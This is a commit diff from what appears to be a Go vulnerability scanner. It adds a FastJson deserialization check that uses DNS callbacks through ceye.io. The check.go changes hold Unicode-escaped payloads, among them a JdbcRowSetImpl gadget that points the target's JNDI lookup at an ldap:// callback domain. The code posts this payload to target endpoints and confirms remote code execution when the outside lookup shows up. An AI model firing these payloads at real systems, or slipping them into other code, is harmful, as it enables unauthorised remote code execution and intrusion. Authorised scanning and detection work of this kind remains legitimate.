FastJson poc add DnsLog check

veo · Nov 3, 2021 · 6a9a013 · 6a9a013
1 parent bca24e2
commit 6a9a013
Show file tree

Hide file tree

Showing 3 changed files with 65 additions and 7 deletions.
diff --git a/pkg/naabu/runner/runner.go b/pkg/naabu/runner/runner.go
@@ -66,6 +66,8 @@ func (r *Runner) httpxrun() error {
 	httpxoptions.Silent = r.options.Silent
 	httpxoptions.Output = r.options.Output
 	httpxoptions.HTTPProxy = r.options.Proxy
+	pkg.CeyeApi = r.options.CeyeApi
+	pkg.CeyeDomain = r.options.CeyeDomain
 	pkg.HttpProxy = r.options.Proxy
 	pkg.NoColor = r.options.NoColor
 	pkg.Output = r.options.Output

diff --git a/pkg/util.go b/pkg/util.go
@@ -2,8 +2,10 @@ package pkg
 
 import (
 	"crypto/tls"
+	"fmt"
 	"github.com/corpix/uarand"
 	"io/ioutil"
+	"math/rand"
 	"net/http"
 	"net/http/cookiejar"
 	"net/url"
@@ -22,7 +24,11 @@ type Response struct {
 	Location      string
 }
 
-var HttpProxy string
+var (
+	HttpProxy  string
+	CeyeApi    string
+	CeyeDomain string
+)
 
 func HttpRequsetBasic(username string, password string, urlstring string, method string, postdata string, isredirect bool, headers map[string]string) (*Response, error) {
 	var tr *http.Transport
@@ -141,6 +147,39 @@ func HttpRequset(urlstring string, method string, postdata string, isredirect bo
 	return &Response{resp.Status, resp.StatusCode, reqbody, resp.Header, len(reqbody), resp.Request.URL.String(), location}, nil
 }
 
+func Dnslogchek(randomstr string) bool {
+	urlStr := fmt.Sprintf("http://api.ceye.io/v1/records?token=%s&type=dns&filter=%s", CeyeApi, randomstr)
+	if resp, err := HttpRequset(urlStr, "GET", "", false, nil); err == nil {
+		if !strings.Contains(resp.Body, `"data": []`) { // api返回结果不为空
+			return true
+		}
+	}
+	return false
+}
+
+func RandomStr() string {
+	lowercase := "1234567890abcdefghijklmnopqrstuvwxyz"
+	randSource := rand.New(rand.NewSource(time.Now().Unix()))
+	const (
+		letterIdxBits = 6                    // 6 bits to represent a letter index
+		letterIdxMask = 1<<letterIdxBits - 1 // All 1-bits, as many as letterIdxBits
+		letterIdxMax  = 63 / letterIdxBits   // # of letter indices fitting in 63 bits
+	)
+	randBytes := make([]byte, 8)
+	for i, cache, remain := 8-1, randSource.Int63(), letterIdxMax; i >= 0; {
+		if remain == 0 {
+			cache, remain = randSource.Int63(), letterIdxMax
+		}
+		if idx := int(cache & letterIdxMask); idx < len(lowercase) {
+			randBytes[i] = lowercase[idx]
+			i--
+		}
+		cache >>= letterIdxBits
+		remain--
+	}
+	return string(randBytes)
+}
+
 func IntInSlice(i int, slice []int) bool {
 	if slice == nil {
 		return false

diff --git a/pocs_go/fastjson/check.go b/pocs_go/fastjson/check.go
@@ -8,19 +8,36 @@ import (
 	"strings"
 )
 
+var (
+	payload1   = `{"\u0040\u0074\u0079\u0070\u0065": "\u006A\u0061\u0076\u0061\u002E\u006C\u0061\u006E\u0067\u002E\u0041\u0075\u0074\u006F\u0043\u006C\u006F\u0073\u0065\u0061\u0062\u006C\u0065"`
+	payload2_1 = `{"name":{"\u0040\u0074\u0079\u0070\u0065":"\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073","\u0076\u0061\u006c":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c"},"f":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"ldap://`
+	payload2_2 = `/object","autoCommit":true}}`
+)
+
 func Check(u string) string {
 	domainx := getinputurl(u)
 	for _, jsonurl := range domainx {
 		header := make(map[string]string)
 		header["Content-Type"] = "application/json;charset=UTF-8"
-		if req, err := pkg.HttpRequset(jsonurl, "POST", `{"\u0040\u0074\u0079\u0070\u0065": "\u006A\u0061\u0076\u0061\u002E\u006C\u0061\u006E\u0067\u002E\u0041\u0075\u0074\u006F\u0043\u006C\u006F\u0073\u0065\u0061\u0062\u006C\u0065"`, false, header); err == nil {
-			fastjsonreg := regexp.MustCompile(`fastjson-version (1\.2\.\d+)`)
-			fastjsonversionlilst := fastjsonreg.FindStringSubmatch(req.Body)
-			if fastjsonversionlilst != nil {
-				pkg.GoPocLog(fmt.Sprintf("Found vuln fastjson version %s|%s\n", fastjsonversionlilst[len(fastjsonversionlilst)-1:][0], u))
-				return fastjsonversionlilst[len(fastjsonversionlilst)-1:][0]
+		if pkg.CeyeApi != "" && pkg.CeyeDomain != "" {
+			randomstr := pkg.RandomStr()
+			if _, err := pkg.HttpRequset(jsonurl, "POST", payload2_1+randomstr+"."+pkg.CeyeDomain+payload2_2, false, header); err == nil {
+				if pkg.Dnslogchek(randomstr) {
+					pkg.GoPocLog(fmt.Sprintf("Found vuln FastJson LDAP RCE |%s\n", u))
+					return "LDAP RCE"
+				}
+			}
+		} else {
+			if req, err := pkg.HttpRequset(jsonurl, "POST", payload1, false, header); err == nil {
+				fastjsonreg := regexp.MustCompile(`fastjson-version (1\.2\.\d+)`)
+				fastjsonversionlilst := fastjsonreg.FindStringSubmatch(req.Body)
+				if fastjsonversionlilst != nil {
+					pkg.GoPocLog(fmt.Sprintf("Found vuln fastjson version %s|%s\n", fastjsonversionlilst[len(fastjsonversionlilst)-1:][0], u))
+					return fastjsonversionlilst[len(fastjsonversionlilst)-1:][0]
+				}
 			}
 		}
+
 	}
 	return ""
 }